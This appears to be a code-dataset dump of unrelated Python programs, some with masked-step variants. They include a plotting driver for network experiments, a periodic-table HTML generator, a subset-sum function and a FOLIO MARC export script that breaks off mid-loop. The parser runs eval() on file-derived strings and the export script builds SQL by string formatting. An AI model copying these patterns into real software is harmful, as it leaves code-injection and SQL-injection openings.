args.dates:\n if not(args.gallery or args.create):\n # silently ignored for the moment, otherwise all other commands will\n # launch a wanrning or an error on the default --dates value\n pass\n\n if args.dates == 'source':\n pass\n elif args.dates == 'diary':\n if args.create:\n error('Incorrect date format', args.dates)\n elif re.match(r'\\d+-\\d+', args.dates):\n date1, date2 = args.dates.split('-')\n if validate_date(date1) and validate_date(date2):\n args.dates = date1, date2\n else:\n error('Incorrect date format', args.dates)\n else:\n 
error('Incorrect date format', args.dates)\n\n\ndef main(argstring=None):\n colorama.init()\n args = parse_command_line(argstring)\n setup_part1(args)\n read_config(args)\n setup_part2(args)\n try:\n if args.gallery or args.update:\n create_gallery(args)\n\n elif args.create:\n create_diary(args)\n\n elif args.blogger:\n prepare_for_blogger(args)\n\n elif args.idem:\n idempotence(args)\n\n elif args.setcfg:\n setconfig_cmd(args)\n\n except KeyboardInterrupt:\n warning('Interrupted by user.')\n\n\nif __name__ == '__main__':\n main(' '.join(sys.argv[1:]))\n",
"step-ids": [
79,
84,
88,
100,
110
]
}
|
[
79,
84,
88,
100,
110
] |
#! /usr/bin/python
import math
import sys
import os
import subprocess
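
# Build the list of experiments/baseline/<id>.stats files for a sweep of
# packet counts (each label is the approximate data size, 2048 bytes per
# packet) and call ./plot_fast_net.py once per metric (RD, WR, APRD, APWR)
# to produce the baseline-*.pdf plots.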
#PTYPES = [ "eth_ip_udp_head_t", "ip_udp_head_t", "eth_32ip_udp_head_t", "eth_64ip_udp_head_t", "eth64_64ip64_64udp_head_t", "eth6464_64ip64_64udp_head_t" ]
#PTYPES = [ "eth_ip_udp_head_t", "eth_32ip_udp_head_t", "eth_64ip_udp_head_t", "eth64_64ip64_64udp_head_t", "eth6464_64ip64_64udp_head_t" ]
PTYPE = "volatile eth_ip_udp_head_t"
#PTYPE = "volatile eth6464_64ip64_64udp_head_t"
def log_out(out):
print(out[:-1])
def run_proc(p, wait):
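    # Run shell command p and log its stderr/stdout via log_out().
    # With wait=False the work is done in a forked child process so the caller
    # returns immediately; the child exits via sys.exit(0) once logging is done.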
if not wait:
pid = os.fork()
if pid != 0:
return
    proc = subprocess.Popen(p, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    # communicate() drains both pipes before waiting, avoiding the deadlock
    # that wait() can cause when a pipe buffer fills up
    out, err = proc.communicate()

    log_out("STDERR -- %s\n" % p)
    for line in err.splitlines(True):
        log_out(line)

    log_out("STDOUT -- %s\n" % p)
    for line in out.splitlines(True):
        log_out(line)
if not wait:
sys.exit(0)
args = []
for i in [1,10] + \
range(100,1000,200) + \
range(1000,10 *1000, 1000) + \
range(10 * 1000,100 * 1000, 20 * 1000) + \
range(100 * 1000, 1000 * 1000, 200 * 1000) + \
range(1000 * 1000, 5 * 1000 * 1000, 2000 * 1000):
packet_count = i
outdir = "experiments/baseline"
test_id = "%010i" % (packet_count)
args.append( "%s/%s.stats %4.2fMB" % (outdir, test_id, i * 2048 / 1024.0 / 1024.0))
cmd = "./plot_fast_net.py RD %s baseline-rd.pdf" % (" ".join(args) )
print(cmd)
run_proc(cmd,False)
cmd = "./plot_fast_net.py WR %s baseline-wr.pdf" % (" ".join(args) )
print(cmd)
run_proc(cmd,True)
cmd = "./plot_fast_net.py APRD %s baseline-aprd.pdf" % (" ".join(args) )
print(cmd)
run_proc(cmd,False)
cmd = "./plot_fast_net.py APWR %s baseline-apwr.pdf" % (" ".join(args) )
print(cmd)
run_proc(cmd,True)
|
normal
|
{
"blob_id": "9101fc5b8ba04a1b72e0c79d5bf3e4118e1bad75",
"index": 5676,
"step-1": "#! /usr/bin/python\n\nimport math\nimport sys\nimport os\nimport subprocess\n\n\n#PTYPES = [ \"eth_ip_udp_head_t\", \"ip_udp_head_t\", \"eth_32ip_udp_head_t\", \"eth_64ip_udp_head_t\", \"eth64_64ip64_64udp_head_t\", \"eth6464_64ip64_64udp_head_t\" ]\n#PTYPES = [ \"eth_ip_udp_head_t\", \"eth_32ip_udp_head_t\", \"eth_64ip_udp_head_t\", \"eth64_64ip64_64udp_head_t\", \"eth6464_64ip64_64udp_head_t\" ]\nPTYPE = \"volatile eth_ip_udp_head_t\" \n#PTYPE = \"volatile eth6464_64ip64_64udp_head_t\" \n\ndef log_out(out): \n print(out[:-1])\n\n\ndef run_proc(p, wait):\n if not wait: \n pid = os.fork()\n if pid != 0:\n return\n\n \n proc = subprocess.Popen(p, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) \n proc.wait()\n\n log_out(\"STDERR -- %s\\n\" % p)\n for line in proc.stderr:\n log_out(line)\n\n log_out(\"STDOUT -- %s\\n\" % p)\n for line in proc.stdout:\n log_out(line)\n\n if not wait:\n\t sys.exit(0)\n\n\nargs = []\nfor i in [1,10] + \\\n range(100,1000,200) + \\\n range(1000,10 *1000, 1000) + \\\n range(10 * 1000,100 * 1000, 20 * 1000) + \\\n range(100 * 1000, 1000 * 1000, 200 * 1000) + \\\n range(1000 * 1000, 5 * 1000 * 1000, 2000 * 1000): \n packet_count = i \n\n outdir = \"experiments/baseline\"\n\n test_id = \"%010i\" % (packet_count)\n\n args.append( \"%s/%s.stats %4.2fMB\" % (outdir, test_id, i * 2048 / 1024.0 / 1024.0)) \n\n\ncmd = \"./plot_fast_net.py RD %s baseline-rd.pdf\" % (\" \".join(args) )\nprint cmd\nrun_proc(cmd,False)\n\ncmd = \"./plot_fast_net.py WR %s baseline-wr.pdf\" % (\" \".join(args) )\nprint cmd\nrun_proc(cmd,True)\n\ncmd = \"./plot_fast_net.py APRD %s baseline-aprd.pdf\" % (\" \".join(args) )\nprint cmd\nrun_proc(cmd,False)\n\ncmd = \"./plot_fast_net.py APWR %s baseline-apwr.pdf\" % (\" \".join(args) )\nprint cmd\nrun_proc(cmd,True)\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/env python3
import sys
class Parse:
data = []
def __parseLine(line):
"""Parse the given line"""
# extract name
name_len = line.index(" ")
name = line[:name_len]
line = line[name_len + 3:]
# array-ize 'electron' val
elec_pos = line.index("electron") + 9
line = line[:elec_pos] + '[' + line[elec_pos:].replace(' ', ',') + ']'
# quote 'small' val
line = line.replace(' ', '')
line = line.replace('small:', 'small:"').replace(',molar', '",molar')
# quote all keys
for i in ["position", "number", "small", "molar", "electron"]:
line = line.replace(i, '"' + i + '"')
return eval('{"name":"' + name + '",' + line + '}')
def parseFile(filename):
"""Parse the given file"""
Parse.data = []
with open(filename, "r") as f:
for line in f:
Parse.data += [Parse.__parseLine(line)]
return Parse.data
class Write:
def __writeHeader(fd):
"""Write html header"""
print(
"<!DOCTYPE html>",
"<html>",
" <head>",
" <title>Super Tableau 3000</title>",
" <meta charset='utf-8' />",
" <style>", # ty alex for css!
" table { border-collapse: collapse; }",
" td { border: solid; }",
" h4, li { font-size:10px; }",
" .empty { border: 0px; }",
" </style>",
" </head>",
" <body>",
" <table>",
sep="\n",
file=fd
)
def __writeFooter(fd):
"""Write html footer"""
print(
" </table>",
" </body>",
"</html>",
sep="\n",
file=fd
)
def __openRow(fd):
"""Write opening html table row"""
print(" <tr>", file=fd)
def __closeRow(fd):
"""Write closing html table row"""
print(" </tr>", file=fd)
def __writeElement(fd, elm):
"""Write html table cell"""
print(
" <td>",
" <h4>" + elm["name"] + "</h4>",
" <ul>",
" <li>" + str(elm["number"]) + "</li>",
" <li>" + elm["small"] + "</li>",
" <li>" + str(elm["molar"]) + "</li>",
" </ul>",
" </td>",
sep="\n",
file=fd
)
def __writeEmptyElement(fd):
"""Write html empty table cell"""
print(" <td class='empty'></td>", file=fd)
def writeFile(filename):
"""Write our awesome html file"""
with open(filename, "w") as f:
Write.__writeHeader(f)
Write.__openRow(f)
i = 0
for elm in Parse.data:
while i != elm["position"]:
Write.__writeEmptyElement(f)
i += 1
Write.__writeElement(f, elm)
i += 1
if elm["position"] == 17:
i = 0
Write.__closeRow(f)
if elm["number"] != 118:
Write.__openRow(f)
Write.__writeFooter(f)
def doTheJob(input_file):
"""Do all we need"""
Parse.parseFile(input_file)
Write.writeFile(input_file.replace(".txt", ".html"))
if __name__ == '__main__':
if len(sys.argv) == 2:
doTheJob(sys.argv[1])
else:
doTheJob("./ex07/periodic_table.txt")
|
normal
|
{
"blob_id": "cb77696a90716acdee83a1cf6162a8f42c524e11",
"index": 7612,
"step-1": "<mask token>\n\n\nclass Write:\n\n def __writeHeader(fd):\n \"\"\"Write html header\"\"\"\n print('<!DOCTYPE html>', '<html>', ' <head>',\n ' <title>Super Tableau 3000</title>',\n \" <meta charset='utf-8' />\", ' <style>',\n ' table { border-collapse: collapse; }',\n ' td { border: solid; }', ' h4, li { font-size:10px; }',\n ' .empty { border: 0px; }', ' </style>', ' </head>',\n ' <body>', ' <table>', sep='\\n', file=fd)\n\n def __writeFooter(fd):\n \"\"\"Write html footer\"\"\"\n print(' </table>', ' </body>', '</html>', sep='\\n', file=fd)\n\n def __openRow(fd):\n \"\"\"Write opening html table row\"\"\"\n print(' <tr>', file=fd)\n\n def __closeRow(fd):\n \"\"\"Write closing html table row\"\"\"\n print(' </tr>', file=fd)\n\n def __writeElement(fd, elm):\n \"\"\"Write html table cell\"\"\"\n print(' <td>', ' <h4>' + elm['name'] + '</h4>', ' <ul>',\n ' <li>' + str(elm['number']) + '</li>', ' <li>' + elm\n ['small'] + '</li>', ' <li>' + str(elm['molar']) + '</li>',\n ' </ul>', ' </td>', sep='\\n', file=fd)\n\n def __writeEmptyElement(fd):\n \"\"\"Write html empty table cell\"\"\"\n print(\" <td class='empty'></td>\", file=fd)\n\n def writeFile(filename):\n \"\"\"Write our awesome html file\"\"\"\n with open(filename, 'w') as f:\n Write.__writeHeader(f)\n Write.__openRow(f)\n i = 0\n for elm in Parse.data:\n while i != elm['position']:\n Write.__writeEmptyElement(f)\n i += 1\n Write.__writeElement(f, elm)\n i += 1\n if elm['position'] == 17:\n i = 0\n Write.__closeRow(f)\n if elm['number'] != 118:\n Write.__openRow(f)\n Write.__writeFooter(f)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Parse:\n <mask token>\n\n def __parseLine(line):\n \"\"\"Parse the given line\"\"\"\n name_len = line.index(' ')\n name = line[:name_len]\n line = line[name_len + 3:]\n elec_pos = line.index('electron') + 9\n line = line[:elec_pos] + '[' + line[elec_pos:].replace(' ', ',') + ']'\n line = line.replace(' ', '')\n line = line.replace('small:', 'small:\"').replace(',molar', '\",molar')\n for i in ['position', 'number', 'small', 'molar', 'electron']:\n line = line.replace(i, '\"' + i + '\"')\n return eval('{\"name\":\"' + name + '\",' + line + '}')\n\n def parseFile(filename):\n \"\"\"Parse the given file\"\"\"\n Parse.data = []\n with open(filename, 'r') as f:\n for line in f:\n Parse.data += [Parse.__parseLine(line)]\n return Parse.data\n\n\nclass Write:\n\n def __writeHeader(fd):\n \"\"\"Write html header\"\"\"\n print('<!DOCTYPE html>', '<html>', ' <head>',\n ' <title>Super Tableau 3000</title>',\n \" <meta charset='utf-8' />\", ' <style>',\n ' table { border-collapse: collapse; }',\n ' td { border: solid; }', ' h4, li { font-size:10px; }',\n ' .empty { border: 0px; }', ' </style>', ' </head>',\n ' <body>', ' <table>', sep='\\n', file=fd)\n\n def __writeFooter(fd):\n \"\"\"Write html footer\"\"\"\n print(' </table>', ' </body>', '</html>', sep='\\n', file=fd)\n\n def __openRow(fd):\n \"\"\"Write opening html table row\"\"\"\n print(' <tr>', file=fd)\n\n def __closeRow(fd):\n \"\"\"Write closing html table row\"\"\"\n print(' </tr>', file=fd)\n\n def __writeElement(fd, elm):\n \"\"\"Write html table cell\"\"\"\n print(' <td>', ' <h4>' + elm['name'] + '</h4>', ' <ul>',\n ' <li>' + str(elm['number']) + '</li>', ' <li>' + elm\n ['small'] + '</li>', ' <li>' + str(elm['molar']) + '</li>',\n ' </ul>', ' </td>', sep='\\n', file=fd)\n\n def __writeEmptyElement(fd):\n \"\"\"Write html empty table cell\"\"\"\n print(\" <td class='empty'></td>\", file=fd)\n\n def writeFile(filename):\n \"\"\"Write our awesome html file\"\"\"\n with open(filename, 'w') as f:\n Write.__writeHeader(f)\n Write.__openRow(f)\n i = 0\n for elm in Parse.data:\n while i != elm['position']:\n Write.__writeEmptyElement(f)\n i += 1\n Write.__writeElement(f, elm)\n i += 1\n if elm['position'] == 17:\n i = 0\n Write.__closeRow(f)\n if elm['number'] != 118:\n Write.__openRow(f)\n Write.__writeFooter(f)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Parse:\n data = []\n\n def __parseLine(line):\n \"\"\"Parse the given line\"\"\"\n name_len = line.index(' ')\n name = line[:name_len]\n line = line[name_len + 3:]\n elec_pos = line.index('electron') + 9\n line = line[:elec_pos] + '[' + line[elec_pos:].replace(' ', ',') + ']'\n line = line.replace(' ', '')\n line = line.replace('small:', 'small:\"').replace(',molar', '\",molar')\n for i in ['position', 'number', 'small', 'molar', 'electron']:\n line = line.replace(i, '\"' + i + '\"')\n return eval('{\"name\":\"' + name + '\",' + line + '}')\n\n def parseFile(filename):\n \"\"\"Parse the given file\"\"\"\n Parse.data = []\n with open(filename, 'r') as f:\n for line in f:\n Parse.data += [Parse.__parseLine(line)]\n return Parse.data\n\n\nclass Write:\n\n def __writeHeader(fd):\n \"\"\"Write html header\"\"\"\n print('<!DOCTYPE html>', '<html>', ' <head>',\n ' <title>Super Tableau 3000</title>',\n \" <meta charset='utf-8' />\", ' <style>',\n ' table { border-collapse: collapse; }',\n ' td { border: solid; }', ' h4, li { font-size:10px; }',\n ' .empty { border: 0px; }', ' </style>', ' </head>',\n ' <body>', ' <table>', sep='\\n', file=fd)\n\n def __writeFooter(fd):\n \"\"\"Write html footer\"\"\"\n print(' </table>', ' </body>', '</html>', sep='\\n', file=fd)\n\n def __openRow(fd):\n \"\"\"Write opening html table row\"\"\"\n print(' <tr>', file=fd)\n\n def __closeRow(fd):\n \"\"\"Write closing html table row\"\"\"\n print(' </tr>', file=fd)\n\n def __writeElement(fd, elm):\n \"\"\"Write html table cell\"\"\"\n print(' <td>', ' <h4>' + elm['name'] + '</h4>', ' <ul>',\n ' <li>' + str(elm['number']) + '</li>', ' <li>' + elm\n ['small'] + '</li>', ' <li>' + str(elm['molar']) + '</li>',\n ' </ul>', ' </td>', sep='\\n', file=fd)\n\n def __writeEmptyElement(fd):\n \"\"\"Write html empty table cell\"\"\"\n print(\" <td class='empty'></td>\", file=fd)\n\n def writeFile(filename):\n \"\"\"Write our awesome html file\"\"\"\n with open(filename, 'w') as f:\n Write.__writeHeader(f)\n Write.__openRow(f)\n i = 0\n for elm in Parse.data:\n while i != elm['position']:\n Write.__writeEmptyElement(f)\n i += 1\n Write.__writeElement(f, elm)\n i += 1\n if elm['position'] == 17:\n i = 0\n Write.__closeRow(f)\n if elm['number'] != 118:\n Write.__openRow(f)\n Write.__writeFooter(f)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Parse:\n data = []\n\n def __parseLine(line):\n \"\"\"Parse the given line\"\"\"\n name_len = line.index(' ')\n name = line[:name_len]\n line = line[name_len + 3:]\n elec_pos = line.index('electron') + 9\n line = line[:elec_pos] + '[' + line[elec_pos:].replace(' ', ',') + ']'\n line = line.replace(' ', '')\n line = line.replace('small:', 'small:\"').replace(',molar', '\",molar')\n for i in ['position', 'number', 'small', 'molar', 'electron']:\n line = line.replace(i, '\"' + i + '\"')\n return eval('{\"name\":\"' + name + '\",' + line + '}')\n\n def parseFile(filename):\n \"\"\"Parse the given file\"\"\"\n Parse.data = []\n with open(filename, 'r') as f:\n for line in f:\n Parse.data += [Parse.__parseLine(line)]\n return Parse.data\n\n\nclass Write:\n\n def __writeHeader(fd):\n \"\"\"Write html header\"\"\"\n print('<!DOCTYPE html>', '<html>', ' <head>',\n ' <title>Super Tableau 3000</title>',\n \" <meta charset='utf-8' />\", ' <style>',\n ' table { border-collapse: collapse; }',\n ' td { border: solid; }', ' h4, li { font-size:10px; }',\n ' .empty { border: 0px; }', ' </style>', ' </head>',\n ' <body>', ' <table>', sep='\\n', file=fd)\n\n def __writeFooter(fd):\n \"\"\"Write html footer\"\"\"\n print(' </table>', ' </body>', '</html>', sep='\\n', file=fd)\n\n def __openRow(fd):\n \"\"\"Write opening html table row\"\"\"\n print(' <tr>', file=fd)\n\n def __closeRow(fd):\n \"\"\"Write closing html table row\"\"\"\n print(' </tr>', file=fd)\n\n def __writeElement(fd, elm):\n \"\"\"Write html table cell\"\"\"\n print(' <td>', ' <h4>' + elm['name'] + '</h4>', ' <ul>',\n ' <li>' + str(elm['number']) + '</li>', ' <li>' + elm\n ['small'] + '</li>', ' <li>' + str(elm['molar']) + '</li>',\n ' </ul>', ' </td>', sep='\\n', file=fd)\n\n def __writeEmptyElement(fd):\n \"\"\"Write html empty table cell\"\"\"\n print(\" <td class='empty'></td>\", file=fd)\n\n def writeFile(filename):\n \"\"\"Write our awesome html file\"\"\"\n with open(filename, 'w') as f:\n Write.__writeHeader(f)\n Write.__openRow(f)\n i = 0\n for elm in Parse.data:\n while i != elm['position']:\n Write.__writeEmptyElement(f)\n i += 1\n Write.__writeElement(f, elm)\n i += 1\n if elm['position'] == 17:\n i = 0\n Write.__closeRow(f)\n if elm['number'] != 118:\n Write.__openRow(f)\n Write.__writeFooter(f)\n\n\ndef doTheJob(input_file):\n \"\"\"Do all we need\"\"\"\n Parse.parseFile(input_file)\n Write.writeFile(input_file.replace('.txt', '.html'))\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/env python3\n\nimport sys\n\n\nclass Parse:\n data = []\n\n def __parseLine(line):\n \"\"\"Parse the given line\"\"\"\n\n # extract name\n name_len = line.index(\" \")\n name = line[:name_len]\n line = line[name_len + 3:]\n\n # array-ize 'electron' val\n elec_pos = line.index(\"electron\") + 9\n line = line[:elec_pos] + '[' + line[elec_pos:].replace(' ', ',') + ']'\n\n # quote 'small' val\n line = line.replace(' ', '')\n line = line.replace('small:', 'small:\"').replace(',molar', '\",molar')\n\n # quote all keys\n for i in [\"position\", \"number\", \"small\", \"molar\", \"electron\"]:\n line = line.replace(i, '\"' + i + '\"')\n\n return eval('{\"name\":\"' + name + '\",' + line + '}')\n\n def parseFile(filename):\n \"\"\"Parse the given file\"\"\"\n\n Parse.data = []\n with open(filename, \"r\") as f:\n for line in f:\n Parse.data += [Parse.__parseLine(line)]\n return Parse.data\n\n\nclass Write:\n def __writeHeader(fd):\n \"\"\"Write html header\"\"\"\n\n print(\n \"<!DOCTYPE html>\",\n \"<html>\",\n \" <head>\",\n \" <title>Super Tableau 3000</title>\",\n \" <meta charset='utf-8' />\",\n \" <style>\", # ty alex for css!\n \" table { border-collapse: collapse; }\",\n \" td { border: solid; }\",\n \" h4, li { font-size:10px; }\",\n \" .empty { border: 0px; }\",\n \" </style>\",\n \" </head>\",\n \" <body>\",\n \" <table>\",\n sep=\"\\n\",\n file=fd\n )\n\n def __writeFooter(fd):\n \"\"\"Write html footer\"\"\"\n\n print(\n \" </table>\",\n \" </body>\",\n \"</html>\",\n sep=\"\\n\",\n file=fd\n )\n\n def __openRow(fd):\n \"\"\"Write opening html table row\"\"\"\n\n print(\" <tr>\", file=fd)\n\n def __closeRow(fd):\n \"\"\"Write closing html table row\"\"\"\n\n print(\" </tr>\", file=fd)\n\n def __writeElement(fd, elm):\n \"\"\"Write html table cell\"\"\"\n\n print(\n \" <td>\",\n \" <h4>\" + elm[\"name\"] + \"</h4>\",\n \" <ul>\",\n \" <li>\" + str(elm[\"number\"]) + \"</li>\",\n \" <li>\" + elm[\"small\"] + \"</li>\",\n \" <li>\" + str(elm[\"molar\"]) + \"</li>\",\n \" </ul>\",\n \" </td>\",\n sep=\"\\n\",\n file=fd\n )\n\n def __writeEmptyElement(fd):\n \"\"\"Write html empty table cell\"\"\"\n\n print(\" <td class='empty'></td>\", file=fd)\n\n def writeFile(filename):\n \"\"\"Write our awesome html file\"\"\"\n\n with open(filename, \"w\") as f:\n Write.__writeHeader(f)\n\n Write.__openRow(f)\n i = 0\n for elm in Parse.data:\n while i != elm[\"position\"]:\n Write.__writeEmptyElement(f)\n i += 1\n\n Write.__writeElement(f, elm)\n i += 1\n\n if elm[\"position\"] == 17:\n i = 0\n Write.__closeRow(f)\n if elm[\"number\"] != 118:\n Write.__openRow(f)\n\n Write.__writeFooter(f)\n\n\ndef doTheJob(input_file):\n \"\"\"Do all we need\"\"\"\n\n Parse.parseFile(input_file)\n Write.writeFile(input_file.replace(\".txt\", \".html\"))\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 2:\n doTheJob(sys.argv[1])\n else:\n doTheJob(\"./ex07/periodic_table.txt\")\n",
"step-ids": [
8,
11,
12,
13,
16
]
}
|
[
8,
11,
12,
13,
16
] |
#!/usr/bin/env python
def findSubset(s0, s, t):
    """Recursive subset-sum search.

    s0 holds the elements chosen so far, s the elements still available and
    t the remaining target. Returns the chosen subset once t reaches 0,
    True if t was already 0 with nothing chosen, or False if no subset of
    s sums to t.
    """
    mys0 = s0.copy()
    mys = s.copy()
    if t == 0 and mys0:
        return mys0
    elif t == 0:  # and mys0 == set()
        return True
    else:
        if len(mys) > 0:
            # branch on one element p: either take it (mys1) or leave it (mys0)
            p = mys.pop()
            mys1 = mys0.copy()
            mys1.add(p)
            if t - p < 0:
                # taking p would overshoot the target, so only try the skip branch
                return findSubset(mys0, mys, t)
            else:
                return findSubset(mys1, mys, t - p) or findSubset(mys0, mys, t)
        else:
            return False
if __name__ == "__main__":
candidate = set()
big = set([1,2,3,4,5,6])
total = 11
print(findSubset(candidate, big, total))
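    # Illustrative note, not part of the original script: with big = {1,...,6}
    # and total = 11 the call above prints one subset summing to 11 (e.g.
    # {5, 6}); which one you get depends on the arbitrary order set.pop()
    # visits elements. An unreachable target simply yields False:
    print(findSubset(set(), {2, 4, 8}, 5))  # no subset of {2, 4, 8} sums to 5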
|
normal
|
{
"blob_id": "079610f2aaebec8c6e46ccf21a9d5728df1be8de",
"index": 4155,
"step-1": "<mask token>\n",
"step-2": "def findSubset(s0, s, t):\n mys0 = s0.copy()\n mys = s.copy()\n if t == 0 and mys0:\n return mys0\n elif t == 0:\n return True\n elif len(mys) > 0:\n p = mys.pop()\n mys1 = mys0.copy()\n mys1.add(p)\n if t - p < 0:\n return findSubset(mys0, mys, t)\n else:\n return findSubset(mys1, mys, t - p) or findSubset(mys0, mys, t)\n else:\n return False\n\n\n<mask token>\n",
"step-3": "def findSubset(s0, s, t):\n mys0 = s0.copy()\n mys = s.copy()\n if t == 0 and mys0:\n return mys0\n elif t == 0:\n return True\n elif len(mys) > 0:\n p = mys.pop()\n mys1 = mys0.copy()\n mys1.add(p)\n if t - p < 0:\n return findSubset(mys0, mys, t)\n else:\n return findSubset(mys1, mys, t - p) or findSubset(mys0, mys, t)\n else:\n return False\n\n\nif __name__ == '__main__':\n candidate = set()\n big = set([1, 2, 3, 4, 5, 6])\n total = 11\n print(findSubset(candidate, big, total))\n",
"step-4": "#!/usr/bin/env python\n\n\ndef findSubset(s0, s, t):\n\n mys0 = s0.copy()\n mys = s.copy()\n \n if t == 0 and mys0:\n return mys0\n elif t == 0: # and mys0 == set()\n return True\n else:\n if len(mys) > 0:\n p = mys.pop()\n mys1 = mys0.copy()\n mys1.add(p)\n if t-p < 0:\n return findSubset(mys0, mys, t)\n else:\n return findSubset(mys1, mys, t-p) or findSubset(mys0, mys, t)\n else:\n return False\n \n\n\nif __name__ == \"__main__\":\n\n candidate = set()\n big = set([1,2,3,4,5,6])\n total = 11\n print(findSubset(candidate, big, total))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import pymarc
from pymarc import JSONReader, Field, JSONWriter, XMLWriter
import psycopg2
import psycopg2.extras
import time
import logging
import json
#WRITTEN W/PYTHON 3.7.3
print("...starting export")
# constructing file and log name
timestr = time.strftime("%Y%m%d-%H%M%S")
logging.basicConfig(filename=timestr + "-export.log")
#LOCAL DB
DATABASE_HOST = "redacted"
DATABASE_USERNAME = "redacted"
DATABASE_PASSWORD = "redacted"
DATABASE_PORT = 5432
DATABASE_NAME = "redacted"
TENANT = "redacted"
count = 0
folio_db = psycopg2.connect(
user=DATABASE_USERNAME,
password=DATABASE_PASSWORD,
host=DATABASE_HOST,
port=DATABASE_PORT,
database=DATABASE_NAME
)
#init a lookup of material types (id -> name)
materialTypeLookup = {}
matCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)
select_all_mat = '''
select id, jsonb->>'name' as name from {}_mod_inventory_storage.material_type'''.format(TENANT)
matCursor.execute(select_all_mat)
materialTypes = matCursor.fetchall()
for m in materialTypes:
materialTypeLookup[m['id']] = m['name']
#init a lookup of locations (id -> name)
locLookup = {}
locCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)
select_all_loc = '''
select id, jsonb->>'name' as name from {}_mod_inventory_storage.location'''.format(TENANT)
locCursor.execute(select_all_loc)
locations = locCursor.fetchall()
for l in locations:
locLookup[l['id']] = l['name']
#init a lookup of call number types (id -> name)
callNoTypeLookup = {}
callNoTypeCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)
select_all_call_no_types = '''
select id, jsonb->>'name' as name from {}_mod_inventory_storage.call_number_type'''.format(TENANT)
callNoTypeCursor.execute(select_all_call_no_types)
callNoTypes = callNoTypeCursor.fetchall()
for c in callNoTypes:
callNoTypeLookup[c['id']] = c['name']
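#NOTE: the three lookups above repeat one pattern; a hypothetical helper like
#build_name_lookup() below is shown only as a sketch of how they could be
#built generically -- it is not called anywhere in the original script.
def build_name_lookup(conn, table, tenant=TENANT):
    """Return an {id: name} dict for a *_mod_inventory_storage table."""
    cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
    sql = "select id, jsonb->>'name' as name from {}_mod_inventory_storage.{}".format(tenant, table)
    cur.execute(sql)
    return {r['id']: r['name'] for r in cur.fetchall()}
#example (sketch only): locLookup = build_name_lookup(folio_db, 'location')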
cursor = folio_db.cursor(name='folio',cursor_factory=psycopg2.extras.DictCursor)
#THIS COULD BE MODIFIED TO RETRIEVE X NUMBER OF RECORDS PER FILE
cursor.itersize=300000
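#note (added for clarity): because the cursor is created with a name it is a
#server-side cursor in psycopg2, so rows stream from Postgres in batches of
#itersize rather than being loaded all at once; fetchmany(cursor.itersize)
#below pulls one batch per output file.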
#from {}_mod_marc_storage.marc_record'''.format(TENANT)
select_ids_sql = '''
select
id,
instance_id
from {}_mod_source_record_storage.records_lb where state = {} and (suppress_discovery = False or suppress_discovery is null)'''.format(TENANT,"'ACTUAL'")
print("executing query")
cursor.execute(select_ids_sql)
while True:
print("in the while true - fetching...")
rows = cursor.fetchmany(cursor.itersize)
print("fetch is done")
marcRecordCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)
if rows:
save_file = timestr + "." + str(count) + ".json"
writer = open(save_file,'wt')
print("created the file: " + save_file)
count += 1
for row in rows:
try:
rowId = row['id'];
rowInstanceId = row['instance_id'];
if rowInstanceId == None:
logging.error("BAD RECORD: INSTANCE ID WAS NULL" + str(row))
continue
select_record_sql = '''
select id,
content as marc
from {}_mod_source_record_storage.marc_records_lb where
id = '{}' limit 1'''.format(TENANT, rowId)
#print(select_record_sql)
marcRecordCursor.execute(select_record_sql)
marcRow = marcRecordCursor.fetchone()
marcJsonAsString = json.dumps(marcRow['marc'])
marcString = marcJsonAsString.encode('utf-8').strip()
#print(marcJsonAsString);
for record in JSONReader(marcJsonAsString):
#write MARC JSON to output file
#ADD A 998 FOR EACH HOLDING RECORD
if record['6xx'] is not None:
logging.error("BAD RECORD: 6xx" + str(row))
continue
if record['4xx'] is not None:
logging.error("BAD RECORD: 4xx" + str(row))
continue
select_holding_sql = '''
select id, creation_date, callnumbertypeid,
jsonb->>'permanentLocationId' as permanentlocationid,
jsonb->'holdingsStatements' as holdingstatements,
jsonb->>'callNumber' as callNumber from
{}_mod_inventory_storage.holdings_record
where instanceid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)'''.format(TENANT,rowInstanceId)
#print(select_holding_sql)
marcRecordCursor.execute(select_holding_sql)
holdingRows = marcRecordCursor.fetchall()
for holding in holdingRows:
#print(holding['callnumber'])
holdingsStatements = holding['holdingstatements']
rowHoldingsId = holding['id']
newField = Field(tag = '998',
indicators = [' ',' '],
subfields = ['a',holding.get('callnumber',''),
'l',locLookup.get(holding.get('permanentlocationid',''),'')])
for statement in holdingsStatements:
if statement is not None:
newField.add_subfield('s',statement.get('statement','').replace('Extent of ownership:',''));
record.add_field(newField)
#ADD AN 952 FOR EACH ITEM
select_item_sql = '''
select id, materialtypeid,
jsonb->>'effectiveLocationId' as effectivelocationid,
jsonb->>'barcode' as barcode,
jsonb->'effectiveCallNumberComponents'->>'prefix' as prefix,
jsonb->'effectiveCallNumberComponents'->>'typeId' as callnotype,
jsonb->'effectiveCallNumberComponents'->>'callNumber' as callnumber
from {}_mod_inventory_storage.item where
holdingsrecordid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)'''.format(TENANT,rowHoldingsId)
#print(select_item_sql)
marcRecordCursor.execute(select_item_sql)
itemRows = marcRecordCursor.fetchall()
for item in itemRows:
callNoToUse = item.get('callnumber','na')
#print(callNoToUse)
prefix = item.get('prefix',None)
if (prefix is not None):
callNoToUse = prefix + " " + callNoToUse
record.add_field(
Field(tag = '952',
indicators = [' ',' '],
subfields = ['m',item.get('barcode',''),
'j',callNoTypeLookup.get(item.get('callnotype',''),''),
'd',locLookup.get(item.get('effectivelocationid'),''),
'i',materialTypeLookup.get(item.get('materialtypeid'),''),
'e',callNoToUse]))
if (len(record.leader) < 24):
